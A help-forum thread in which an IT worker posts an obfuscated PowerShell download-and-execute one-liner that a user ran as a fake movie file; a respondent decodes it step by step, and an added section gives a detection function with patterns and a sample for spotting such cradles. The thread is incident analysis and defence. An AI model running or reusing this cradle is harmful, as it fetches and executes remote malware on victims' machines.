need help with identifying actions of a malicious code

    • #162461
      Inactive

I’m looking for clues here.  Long story short, one of our users ran what he thought was a movie file on his company laptop.  But the file isn’t actually a movie but a PowerShell script.  Well, he said he double-clicked on the “movie file” but nothing happened, but I suspect something did happen.

      Script is below:

      =====================
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString('httpp://shortbit.xyz/psp');s $nq

      ======================

      Could the experts chime in and tell me what this script does or attempt to do?  I did check on the URL “shortbit.xyz/psp” in the script and it points to a link to a text file.  I’m assuming it’s a text file that the script will use?

    • #162513
      Participant

      Let’s break it down:

      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 

      This runs powershell.exe in a hidden Window with ExecutionPolicy set to UnRestricted, which allows unsigned scripts to be run.

$ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ',''

      This sets the variable $ag to ieX, which is an alias for the Invoke-Expression cmdlet.

      sal s $ag

      sal is an alias for Set-Alias.
      s is now an alias for Invoke-Expression

      $nq=((New-Object Net.WebClient)).DownloadString('[removed]')

      This sets the $nq variable to the content of the text file.

      s $nq

      This runs Invoke-Expression against the text that was previously downloaded.

      Without knowing the content of the text file it’s not possible to tell what happened next. My guess would be it’s some kind of dropper for malware, possibly ransomware.

      You should consider the machine compromised, remove it from the network and rebuild it.
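A defender-side check for the pattern the reply above walks through, added here as an example (not code from the thread or its posters): it statically decodes the [char[]] array without executing anything and flags the download-cradle indicators in a logged command line. The function name and the sample command lines are constructed for this example; the thread's URL is replaced with a placeholder.

```powershell
# Added example: static triage of a PowerShell command line (e.g. from Sysmon
# event 1 or Windows Security event 4688). Nothing in the input is executed.
function Get-DownloadCradleIndicators {
    param([Parameter(Mandatory)][string]$CommandLine)

    $hits = [System.Collections.Generic.List[string]]::new()

    # Decode every [char[]]@(0x69,0x65,0x58)-style array by casting the
    # literals ourselves, so "ieX" becomes visible without Invoke-Expression.
    $decoded = [regex]::Matches($CommandLine, '\[char\[\]\]@\(([^)]+)\)') | ForEach-Object {
        -join ($_.Groups[1].Value -split ',' | ForEach-Object { [char][int]$_.Trim() })
    }
    foreach ($d in $decoded) { $hits.Add("char-array decodes to '$d'") }

    # The individual pieces the reply above identified, matched case-insensitively.
    if ($CommandLine -match '-Windo\w*\s+(1|Hidden)')            { $hits.Add('hidden window') }
    if ($CommandLine -match '-Exec\w*\s+(Unrestricted|Bypass)')   { $hits.Add('execution policy override') }
    if ($CommandLine -match 'DownloadString|DownloadFile|Invoke-WebRequest') { $hits.Add('remote download') }
    if ($CommandLine -match '\biex\b|Invoke-Expression' -or ($decoded -contains 'ieX')) {
        $hits.Add('Invoke-Expression')
    }
    if ($CommandLine -match '\bsal\b|Set-Alias')                  { $hits.Add('alias redefinition') }

    [pscustomobject]@{
        CommandLine = $CommandLine
        Indicators  = $hits
        Score       = $hits.Count
        Suspicious  = $hits.Count -ge 3   # threshold chosen for this example
    }
}

# Constructed samples: the thread's one-liner (URL replaced) and a benign command.
$samples = @(
    "powershell.exe -ExecutionPolicy UnRestricted -Windo 1 `$ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal s `$ag;`$nq=((New-Object Net.WebClient)).DownloadString('hxxp://example.invalid/psp');s `$nq",
    "powershell.exe -NoProfile -File C:\Scripts\Backup.ps1"
)
$samples | ForEach-Object { Get-DownloadCradleIndicators -CommandLine $_ } | Format-List
```

The first sample scores six indicators (including the decoded alias target), the second scores none; the decoded string is what to look for when the literal "iex" is absent from the command line.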

    • #162519
      Inactive

Thanks for the explanation.  You were right, the “text file” is a dropper trojan.  I’ve directed the user to do a complete antivirus scan of his C: drive and it detected the text file as a dropper trojan.
